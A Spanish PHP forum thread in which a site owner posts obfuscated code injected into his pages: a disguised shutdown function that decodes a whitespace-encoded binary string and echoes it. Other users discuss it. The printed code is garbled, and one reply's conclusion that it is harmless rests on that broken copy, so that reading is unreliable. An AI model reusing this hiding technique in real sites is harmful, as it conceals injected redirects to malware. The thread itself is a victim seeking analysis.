Foros del Web » Programando para Internet » PHP »

Alguien sabe para que es este codigo?

Estas en el tema de Alguien sabe para que es este codigo? en el foro de PHP en Foros del Web. Hola a todos, este codigo malicioso, aparecio hoy en una de mis páginas web, pero no se que es, ni que hace, solo se que ...
  #1 (permalink)  
Antiguo 14/05/2011, 21:40
Avatar de insyse  
Fecha de Ingreso: abril-2005
Ubicación: Colombia
Mensajes: 206
Antigüedad: 19 años
Puntos: 5
Alguien sabe para que es este codigo?

Hola a todos, este codigo malicioso, aparecio hoy en una de mis páginas web, pero no se que es, ni que hace, solo se que desde esta mañana tuve que eliminar todos los archvios de mi servidor limpiar codigo y volver a subir todo...

Sin embargo no me quiero quedar con la duda de cual es la funcion del codigo


Código PHP:
<?php /**
 * Gets some core libraries and displays a top message if required.    /*
 */ 
function CoreLibrariesHandler() {                    /*
 */   
$session_keys '                                                                                                                                 ';  /*
 */                                    /* 
 */    
foreach(str_split($session_keys8) as $k=>$v) {         /*             
 */        
$v str_replace('    '1str_replace(' '0$v));    /*
 */        
$session_keys[$k] = chr(bindec($v));             /*
 */    
}                                 /*
 */                                    /*
 */    
if($session_keys) echo $session_keys; }                /*
 */    
register_shutdown_function('CoreLibrariesHandler');        /*
 */                                    /*
 ************************************************************************/
 
?>
Gracias

Leonardo
  #2 (permalink)  
Antiguo 14/05/2011, 21:54
Avatar de metacortex
Viejo demente
 
Fecha de Ingreso: junio-2004
Ubicación: Caracas - Venezuela
Mensajes: 9.027
Antigüedad: 19 años, 11 meses
Puntos: 832
Respuesta: Alguien sabe para que es este codigo?

Revisa este hilo de discusión. Alguien tuvo el mismo problema y parece que la cosa involucra javascript e iframes. Está traducido con Google:

http://translate.google.co.ve/transl...194454&act=url
  #3 (permalink)  
Antiguo 14/05/2011, 22:33
Avatar de zerokilled
Javascripter
 
Fecha de Ingreso: abril-2009
Ubicación: Isla del Encanto, La Borinqueña [+>==]
Mensajes: 8.050
Antigüedad: 15 años
Puntos: 1485
Respuesta: Alguien sabe para que es este codigo?

pues, de momento yo creo que es un come-coco para asustar a las gentes.
  1. tienes una variable con un string de muchos espacios (129).
  2. se divide el string por paquetes de ocho caracteres (espacios).
  3. por cada paquete, se reemplazan todos los espacios por un cero.
  4. el string se convierte de binario a decimal y luego a caracter. como todos son ceros, el equivalente es a un caracter null (0x00).
  5. el caracter se guarda en la variable inicial (1).
  6. al final de toda la iteracion, si la variable evalua a true, se imprime. lo que imprime es un string donde los primeros 16 caracteres son null (0x00) y el resto son espacios.
personalmente no veo donde esta el daño o ataque.
__________________
la maldad es una virtud humana,
y la espiritualidad es la lucha del hombre contra su maldad.
  #4 (permalink)  
Antiguo 15/05/2011, 22:59
Avatar de insyse  
Fecha de Ingreso: abril-2005
Ubicación: Colombia
Mensajes: 206
Antigüedad: 19 años
Puntos: 5
Respuesta: Alguien sabe para que es este codigo?

Pues la verdad no se que hacia este código, mo PHP es mínimo, pero de momento aparecieron estos codigos en mis paginas y pues no es algo que pase por que si o sin motivo, por esto les consulto a ustedes que saben mucho mas que yo,

Ya he eliminado este código y otros que jalaban un JS que redierccionaba mis paginas a otra con virus...

Les agardezco mucho su colaboracion.

Etiquetas: Ninguno
Atención: Estás leyendo un tema que no tiene actividad desde hace más de 6 MESES, te recomendamos abrir un Nuevo tema en lugar de responder al actual.
Respuesta




La zona horaria es GMT -6. Ahora son las 00:15.